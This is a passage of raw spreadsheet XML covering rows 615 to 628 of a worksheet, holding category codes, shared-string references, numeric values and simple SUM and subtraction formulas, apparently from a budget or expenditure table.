      <c r="R615" s="17"/>
      <c r="S615" s="17"/>
      <c r="T615" s="17"/>
      <c r="U615" s="17"/>
      <c r="V615" s="17"/>
      <c r="W615" s="17"/>
      <c r="X615" s="17"/>
      <c r="Y615" s="17"/>
      <c r="Z615" s="17"/>
      <c r="AA615" s="17"/>
      <c r="AB615" s="17"/>
      <c r="AC615" s="17"/>
      <c r="AD615" s="17"/>
      <c r="AE615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AF615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AG615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AH615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AI615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AJ615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AK615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AL615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AM615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AN615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AO615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AP615" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
    </row>
    <row r="616" ht="18" customHeight="1" spans="1:42">
      <c r="A616" s="10"/>
      <c r="B616" s="10"/>
      <c r="C616" s="28"/>
      <c r="D616" s="10">
        <v>2080999</v>
      </c>
      <c r="E616" s="16" t="s">
        <v>3435</v>
      </c>
      <c r="F616" s="14">
        <f t="shared" si="271"/>
        <v>48</v>
      </c>
      <c r="G616" s="17"/>
      <c r="H616" s="17"/>
      <c r="I616" s="17"/>
      <c r="J616" s="17"/>
      <c r="K616" s="17"/>
      <c r="L616" s="17"/>
      <c r="M616" s="17"/>
      <c r="N616" s="17"/>
      <c r="O616" s="17"/>
      <c r="P616" s="17"/>
      <c r="Q616" s="17">
        <v>48</v>
      </c>
      <c r="R616" s="17"/>
      <c r="S616" s="17"/>
      <c r="T616" s="17"/>
      <c r="U616" s="17"/>
      <c r="V616" s="17"/>
      <c r="W616" s="17"/>
      <c r="X616" s="17"/>
      <c r="Y616" s="17"/>
      <c r="Z616" s="17"/>
      <c r="AA616" s="17"/>
      <c r="AB616" s="17"/>
      <c r="AC616" s="17">
        <v>42</v>
      </c>
      <c r="AD616" s="17"/>
      <c r="AE616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AF616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AG616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AH616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AI616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AJ616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AK616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AL616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AM616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AN616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
      <c r="AO616" s="17">
        <f t="shared" si="283"/>
        <v>6</v>
      </c>
      <c r="AP616" s="17">
        <f t="shared" si="283"/>
        <v>0</v>
      </c>
    </row>
    <row r="617" ht="18" customHeight="1" spans="1:42">
      <c r="A617" s="10"/>
      <c r="B617" s="10"/>
      <c r="C617" s="28"/>
      <c r="D617" s="10">
        <v>20810</v>
      </c>
      <c r="E617" s="11" t="s">
        <v>3436</v>
      </c>
      <c r="F617" s="14">
        <f t="shared" si="271"/>
        <v>2</v>
      </c>
      <c r="G617" s="12">
        <f t="shared" ref="G617:R617" si="284">SUM(G618:G624)</f>
        <v>0</v>
      </c>
      <c r="H617" s="12">
        <f t="shared" si="284"/>
        <v>40</v>
      </c>
      <c r="I617" s="12">
        <f t="shared" si="284"/>
        <v>0</v>
      </c>
      <c r="J617" s="12">
        <f t="shared" si="284"/>
        <v>0</v>
      </c>
      <c r="K617" s="12">
        <f t="shared" si="284"/>
        <v>0</v>
      </c>
      <c r="L617" s="12">
        <f t="shared" si="284"/>
        <v>2</v>
      </c>
      <c r="M617" s="12">
        <f t="shared" si="284"/>
        <v>0</v>
      </c>
      <c r="N617" s="12">
        <f t="shared" si="284"/>
        <v>0</v>
      </c>
      <c r="O617" s="12">
        <f t="shared" si="284"/>
        <v>0</v>
      </c>
      <c r="P617" s="12">
        <f t="shared" si="284"/>
        <v>0</v>
      </c>
      <c r="Q617" s="12">
        <f t="shared" si="284"/>
        <v>0</v>
      </c>
      <c r="R617" s="12">
        <f t="shared" si="284"/>
        <v>0</v>
      </c>
      <c r="S617" s="12">
        <v>0</v>
      </c>
      <c r="T617" s="12">
        <v>40</v>
      </c>
      <c r="U617" s="12">
        <v>0</v>
      </c>
      <c r="V617" s="12">
        <v>0</v>
      </c>
      <c r="W617" s="12">
        <v>0</v>
      </c>
      <c r="X617" s="12">
        <v>2</v>
      </c>
      <c r="Y617" s="12">
        <v>0</v>
      </c>
      <c r="Z617" s="12">
        <v>0</v>
      </c>
      <c r="AA617" s="12">
        <v>0</v>
      </c>
      <c r="AB617" s="12">
        <v>0</v>
      </c>
      <c r="AC617" s="12">
        <v>0</v>
      </c>
      <c r="AD617" s="12">
        <v>0</v>
      </c>
      <c r="AE617" s="12">
        <f t="shared" ref="AE617:AP617" si="285">SUM(AE618:AE624)</f>
        <v>0</v>
      </c>
      <c r="AF617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
      <c r="AG617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
      <c r="AH617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
      <c r="AI617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
      <c r="AJ617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
      <c r="AK617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
      <c r="AL617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
      <c r="AM617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
      <c r="AN617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
      <c r="AO617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
      <c r="AP617" s="12">
        <f t="shared" si="285"/>
        <v>0</v>
      </c>
    </row>
    <row r="618" ht="18" customHeight="1" spans="1:42">
      <c r="A618" s="10"/>
      <c r="B618" s="10"/>
      <c r="C618" s="28"/>
      <c r="D618" s="10">
        <v>2081001</v>
      </c>
      <c r="E618" s="16" t="s">
        <v>3437</v>
      </c>
      <c r="F618" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G618" s="17"/>
      <c r="H618" s="17"/>
      <c r="I618" s="17"/>
      <c r="J618" s="17"/>
      <c r="K618" s="17"/>
      <c r="L618" s="17"/>
      <c r="M618" s="17"/>
      <c r="N618" s="17"/>
      <c r="O618" s="17"/>
      <c r="P618" s="17"/>
      <c r="Q618" s="17"/>
      <c r="R618" s="17"/>
      <c r="S618" s="17"/>
      <c r="T618" s="17"/>
      <c r="U618" s="17"/>
      <c r="V618" s="17"/>
      <c r="W618" s="17"/>
      <c r="X618" s="17"/>
      <c r="Y618" s="17"/>
      <c r="Z618" s="17"/>
      <c r="AA618" s="17"/>
      <c r="AB618" s="17"/>
      <c r="AC618" s="17"/>
      <c r="AD618" s="17"/>
      <c r="AE618" s="17">
        <f t="shared" ref="AE618:AP624" si="286">G618-S618</f>
        <v>0</v>
      </c>
      <c r="AF618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AG618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AH618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AI618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AJ618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AK618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AL618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AM618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AN618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AO618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AP618" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
    </row>
    <row r="619" ht="18" customHeight="1" spans="1:42">
      <c r="A619" s="10"/>
      <c r="B619" s="10"/>
      <c r="C619" s="28"/>
      <c r="D619" s="10">
        <v>2081002</v>
      </c>
      <c r="E619" s="16" t="s">
        <v>3438</v>
      </c>
      <c r="F619" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G619" s="17"/>
      <c r="H619" s="17">
        <v>40</v>
      </c>
      <c r="I619" s="17"/>
      <c r="J619" s="17"/>
      <c r="K619" s="17"/>
      <c r="L619" s="17"/>
      <c r="M619" s="17"/>
      <c r="N619" s="17"/>
      <c r="O619" s="17"/>
      <c r="P619" s="17"/>
      <c r="Q619" s="17"/>
      <c r="R619" s="17"/>
      <c r="S619" s="17"/>
      <c r="T619" s="17">
        <v>40</v>
      </c>
      <c r="U619" s="17"/>
      <c r="V619" s="17"/>
      <c r="W619" s="17"/>
      <c r="X619" s="17"/>
      <c r="Y619" s="17"/>
      <c r="Z619" s="17"/>
      <c r="AA619" s="17"/>
      <c r="AB619" s="17"/>
      <c r="AC619" s="17"/>
      <c r="AD619" s="17"/>
      <c r="AE619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AF619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AG619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AH619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AI619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AJ619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AK619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AL619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AM619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AN619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AO619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AP619" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
    </row>
    <row r="620" ht="18" customHeight="1" spans="1:42">
      <c r="A620" s="10"/>
      <c r="B620" s="10"/>
      <c r="C620" s="28"/>
      <c r="D620" s="10">
        <v>2081003</v>
      </c>
      <c r="E620" s="16" t="s">
        <v>3439</v>
      </c>
      <c r="F620" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G620" s="17"/>
      <c r="H620" s="17"/>
      <c r="I620" s="17"/>
      <c r="J620" s="17"/>
      <c r="K620" s="17"/>
      <c r="L620" s="17"/>
      <c r="M620" s="17"/>
      <c r="N620" s="17"/>
      <c r="O620" s="17"/>
      <c r="P620" s="17"/>
      <c r="Q620" s="17"/>
      <c r="R620" s="17"/>
      <c r="S620" s="17"/>
      <c r="T620" s="17"/>
      <c r="U620" s="17"/>
      <c r="V620" s="17"/>
      <c r="W620" s="17"/>
      <c r="X620" s="17"/>
      <c r="Y620" s="17"/>
      <c r="Z620" s="17"/>
      <c r="AA620" s="17"/>
      <c r="AB620" s="17"/>
      <c r="AC620" s="17"/>
      <c r="AD620" s="17"/>
      <c r="AE620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AF620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AG620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AH620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AI620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AJ620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AK620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AL620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AM620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AN620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AO620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AP620" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
    </row>
    <row r="621" ht="18" customHeight="1" spans="1:42">
      <c r="A621" s="10"/>
      <c r="B621" s="10"/>
      <c r="C621" s="28"/>
      <c r="D621" s="10">
        <v>2081004</v>
      </c>
      <c r="E621" s="16" t="s">
        <v>3440</v>
      </c>
      <c r="F621" s="14">
        <f t="shared" si="271"/>
        <v>2</v>
      </c>
      <c r="G621" s="17"/>
      <c r="H621" s="17"/>
      <c r="I621" s="17"/>
      <c r="J621" s="17"/>
      <c r="K621" s="17"/>
      <c r="L621" s="17">
        <v>2</v>
      </c>
      <c r="M621" s="17"/>
      <c r="N621" s="17"/>
      <c r="O621" s="17"/>
      <c r="P621" s="17"/>
      <c r="Q621" s="17"/>
      <c r="R621" s="17"/>
      <c r="S621" s="17"/>
      <c r="T621" s="17"/>
      <c r="U621" s="17"/>
      <c r="V621" s="17"/>
      <c r="W621" s="17"/>
      <c r="X621" s="17">
        <v>2</v>
      </c>
      <c r="Y621" s="17"/>
      <c r="Z621" s="17"/>
      <c r="AA621" s="17"/>
      <c r="AB621" s="17"/>
      <c r="AC621" s="17"/>
      <c r="AD621" s="17"/>
      <c r="AE621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AF621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AG621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AH621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AI621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AJ621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AK621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AL621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AM621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AN621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AO621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AP621" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
    </row>
    <row r="622" ht="18" customHeight="1" spans="1:42">
      <c r="A622" s="10"/>
      <c r="B622" s="10"/>
      <c r="C622" s="28"/>
      <c r="D622" s="10">
        <v>2081005</v>
      </c>
      <c r="E622" s="16" t="s">
        <v>3441</v>
      </c>
      <c r="F622" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G622" s="17"/>
      <c r="H622" s="17"/>
      <c r="I622" s="17"/>
      <c r="J622" s="17"/>
      <c r="K622" s="17"/>
      <c r="L622" s="17"/>
      <c r="M622" s="17"/>
      <c r="N622" s="17"/>
      <c r="O622" s="17"/>
      <c r="P622" s="17"/>
      <c r="Q622" s="17"/>
      <c r="R622" s="17"/>
      <c r="S622" s="17"/>
      <c r="T622" s="17"/>
      <c r="U622" s="17"/>
      <c r="V622" s="17"/>
      <c r="W622" s="17"/>
      <c r="X622" s="17"/>
      <c r="Y622" s="17"/>
      <c r="Z622" s="17"/>
      <c r="AA622" s="17"/>
      <c r="AB622" s="17"/>
      <c r="AC622" s="17"/>
      <c r="AD622" s="17"/>
      <c r="AE622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AF622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AG622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AH622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AI622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AJ622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AK622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AL622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AM622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AN622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AO622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AP622" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
    </row>
    <row r="623" ht="18" customHeight="1" spans="1:42">
      <c r="A623" s="10"/>
      <c r="B623" s="10"/>
      <c r="C623" s="28"/>
      <c r="D623" s="10">
        <v>2081006</v>
      </c>
      <c r="E623" s="16" t="s">
        <v>3442</v>
      </c>
      <c r="F623" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G623" s="17"/>
      <c r="H623" s="17"/>
      <c r="I623" s="17"/>
      <c r="J623" s="17"/>
      <c r="K623" s="17"/>
      <c r="L623" s="17"/>
      <c r="M623" s="17"/>
      <c r="N623" s="17"/>
      <c r="O623" s="17"/>
      <c r="P623" s="17"/>
      <c r="Q623" s="17"/>
      <c r="R623" s="17"/>
      <c r="S623" s="17"/>
      <c r="T623" s="17"/>
      <c r="U623" s="17"/>
      <c r="V623" s="17"/>
      <c r="W623" s="17"/>
      <c r="X623" s="17"/>
      <c r="Y623" s="17"/>
      <c r="Z623" s="17"/>
      <c r="AA623" s="17"/>
      <c r="AB623" s="17"/>
      <c r="AC623" s="17"/>
      <c r="AD623" s="17"/>
      <c r="AE623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AF623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AG623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AH623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AI623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AJ623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AK623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AL623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AM623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AN623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AO623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AP623" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
    </row>
    <row r="624" ht="18" customHeight="1" spans="1:42">
      <c r="A624" s="10"/>
      <c r="B624" s="10"/>
      <c r="C624" s="28"/>
      <c r="D624" s="10">
        <v>2081099</v>
      </c>
      <c r="E624" s="16" t="s">
        <v>3443</v>
      </c>
      <c r="F624" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G624" s="17"/>
      <c r="H624" s="17"/>
      <c r="I624" s="17"/>
      <c r="J624" s="17"/>
      <c r="K624" s="17"/>
      <c r="L624" s="17"/>
      <c r="M624" s="17"/>
      <c r="N624" s="17"/>
      <c r="O624" s="17"/>
      <c r="P624" s="17"/>
      <c r="Q624" s="17"/>
      <c r="R624" s="17"/>
      <c r="S624" s="17"/>
      <c r="T624" s="17"/>
      <c r="U624" s="17"/>
      <c r="V624" s="17"/>
      <c r="W624" s="17"/>
      <c r="X624" s="17"/>
      <c r="Y624" s="17"/>
      <c r="Z624" s="17"/>
      <c r="AA624" s="17"/>
      <c r="AB624" s="17"/>
      <c r="AC624" s="17"/>
      <c r="AD624" s="17"/>
      <c r="AE624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AF624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AG624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AH624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AI624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AJ624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AK624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AL624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AM624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AN624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AO624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
      <c r="AP624" s="17">
        <f t="shared" si="286"/>
        <v>0</v>
      </c>
    </row>
    <row r="625" ht="18" customHeight="1" spans="1:42">
      <c r="A625" s="10"/>
      <c r="B625" s="10"/>
      <c r="C625" s="28"/>
      <c r="D625" s="10">
        <v>20811</v>
      </c>
      <c r="E625" s="11" t="s">
        <v>3444</v>
      </c>
      <c r="F625" s="14">
        <f t="shared" si="271"/>
        <v>26</v>
      </c>
      <c r="G625" s="12">
        <f t="shared" ref="G625:R625" si="287">SUM(G626:G633)</f>
        <v>2</v>
      </c>
      <c r="H625" s="12">
        <f t="shared" si="287"/>
        <v>0</v>
      </c>
      <c r="I625" s="12">
        <f t="shared" si="287"/>
        <v>2</v>
      </c>
      <c r="J625" s="12">
        <f t="shared" si="287"/>
        <v>9</v>
      </c>
      <c r="K625" s="12">
        <f t="shared" si="287"/>
        <v>6</v>
      </c>
      <c r="L625" s="12">
        <f t="shared" si="287"/>
        <v>3</v>
      </c>
      <c r="M625" s="12">
        <f t="shared" si="287"/>
        <v>0</v>
      </c>
      <c r="N625" s="12">
        <f t="shared" si="287"/>
        <v>2</v>
      </c>
      <c r="O625" s="12">
        <f t="shared" si="287"/>
        <v>0</v>
      </c>
      <c r="P625" s="12">
        <f t="shared" si="287"/>
        <v>0</v>
      </c>
      <c r="Q625" s="12">
        <f t="shared" si="287"/>
        <v>2</v>
      </c>
      <c r="R625" s="12">
        <f t="shared" si="287"/>
        <v>2</v>
      </c>
      <c r="S625" s="12">
        <v>2</v>
      </c>
      <c r="T625" s="12">
        <v>0</v>
      </c>
      <c r="U625" s="12">
        <v>0</v>
      </c>
      <c r="V625" s="12">
        <v>8</v>
      </c>
      <c r="W625" s="12">
        <v>5</v>
      </c>
      <c r="X625" s="12">
        <v>3</v>
      </c>
      <c r="Y625" s="12">
        <v>0</v>
      </c>
      <c r="Z625" s="12">
        <v>2</v>
      </c>
      <c r="AA625" s="12">
        <v>0</v>
      </c>
      <c r="AB625" s="12">
        <v>0</v>
      </c>
      <c r="AC625" s="12">
        <v>0</v>
      </c>
      <c r="AD625" s="12">
        <v>2</v>
      </c>
      <c r="AE625" s="12">
        <f t="shared" ref="AE625:AP625" si="288">SUM(AE626:AE633)</f>
        <v>0</v>
      </c>
      <c r="AF625" s="12">
        <f t="shared" si="288"/>
        <v>0</v>
      </c>
      <c r="AG625" s="12">
        <f t="shared" si="288"/>
        <v>2</v>
      </c>
      <c r="AH625" s="12">
        <f t="shared" si="288"/>
        <v>1</v>
      </c>
      <c r="AI625" s="12">
        <f t="shared" si="288"/>
        <v>1</v>
      </c>
      <c r="AJ625" s="12">
        <f t="shared" si="288"/>
        <v>0</v>
      </c>
      <c r="AK625" s="12">
        <f t="shared" si="288"/>
        <v>0</v>
      </c>
      <c r="AL625" s="12">
        <f t="shared" si="288"/>
        <v>0</v>
      </c>
      <c r="AM625" s="12">
        <f t="shared" si="288"/>
        <v>0</v>
      </c>
      <c r="AN625" s="12">
        <f t="shared" si="288"/>
        <v>0</v>
      </c>
      <c r="AO625" s="12">
        <f t="shared" si="288"/>
        <v>2</v>
      </c>
      <c r="AP625" s="12">
        <f t="shared" si="288"/>
        <v>0</v>
      </c>
    </row>
    <row r="626" ht="18" customHeight="1" spans="1:42">
      <c r="A626" s="10"/>
      <c r="B626" s="10"/>
      <c r="C626" s="28"/>
      <c r="D626" s="10">
        <v>2081101</v>
      </c>
      <c r="E626" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F626" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G626" s="17"/>
      <c r="H626" s="17"/>
      <c r="I626" s="17"/>
      <c r="J626" s="17"/>
      <c r="K626" s="17"/>
      <c r="L626" s="17"/>
      <c r="M626" s="17"/>
      <c r="N626" s="17"/>
      <c r="O626" s="17"/>
      <c r="P626" s="17"/>
      <c r="Q626" s="17"/>
      <c r="R626" s="17"/>
      <c r="S626" s="17"/>
      <c r="T626" s="17"/>
      <c r="U626" s="17"/>
      <c r="V626" s="17"/>
      <c r="W626" s="17"/>
      <c r="X626" s="17"/>
      <c r="Y626" s="17"/>
      <c r="Z626" s="17"/>
      <c r="AA626" s="17"/>
      <c r="AB626" s="17"/>
      <c r="AC626" s="17"/>
      <c r="AD626" s="17"/>
      <c r="AE626" s="17">
        <f t="shared" ref="AE626:AP633" si="289">G626-S626</f>
        <v>0</v>
      </c>
      <c r="AF626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AG626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AH626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AI626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AJ626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AK626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AL626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AM626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AN626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AO626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AP626" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
    </row>
    <row r="627" ht="18" customHeight="1" spans="1:42">
      <c r="A627" s="10"/>
      <c r="B627" s="10"/>
      <c r="C627" s="28"/>
      <c r="D627" s="10">
        <v>2081102</v>
      </c>
      <c r="E627" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F627" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G627" s="17"/>
      <c r="H627" s="17"/>
      <c r="I627" s="17"/>
      <c r="J627" s="17"/>
      <c r="K627" s="17"/>
      <c r="L627" s="17"/>
      <c r="M627" s="17"/>
      <c r="N627" s="17"/>
      <c r="O627" s="17"/>
      <c r="P627" s="17"/>
      <c r="Q627" s="17"/>
      <c r="R627" s="17"/>
      <c r="S627" s="17"/>
      <c r="T627" s="17"/>
      <c r="U627" s="17"/>
      <c r="V627" s="17"/>
      <c r="W627" s="17"/>
      <c r="X627" s="17"/>
      <c r="Y627" s="17"/>
      <c r="Z627" s="17"/>
      <c r="AA627" s="17"/>
      <c r="AB627" s="17"/>
      <c r="AC627" s="17"/>
      <c r="AD627" s="17"/>
      <c r="AE627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AF627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AG627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AH627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AI627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AJ627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AK627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AL627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AM627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AN627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AO627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
      <c r="AP627" s="17">
        <f t="shared" si="289"/>
        <v>0</v>
      </c>
    </row>
    <row r="628" ht="18" customHeight="1" spans="1:42">
      <c r="A628" s="10"/>
      <c r="B628" s="10"/>
      <c r="C628" s="28"/>
      <c r="D628" s="10">
        <v>2081103</v>
      </c>
      <c r="E628" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F628" s="14">
        <f t="shared" si="271"/>
        <v>0</v>
      </c>
      <c r="G628" s="17"/>
      <c r="H628" s="17"/>
      <c r="I628" s="17"/>
      <c r="J628" s="17"/>
      <c r="K628" s="17"/>
      <c r="L628" s="17"/>
      <c r="M628" s="17"/>
      <c r="N628" s="17"/>
      <c r="O628" s="17"/>
      <c r="P628" s="17"/>
      <c r="Q628" s="17"/>
      <c r="R628" s="17"/>
      <c r="S628" s="17"/>
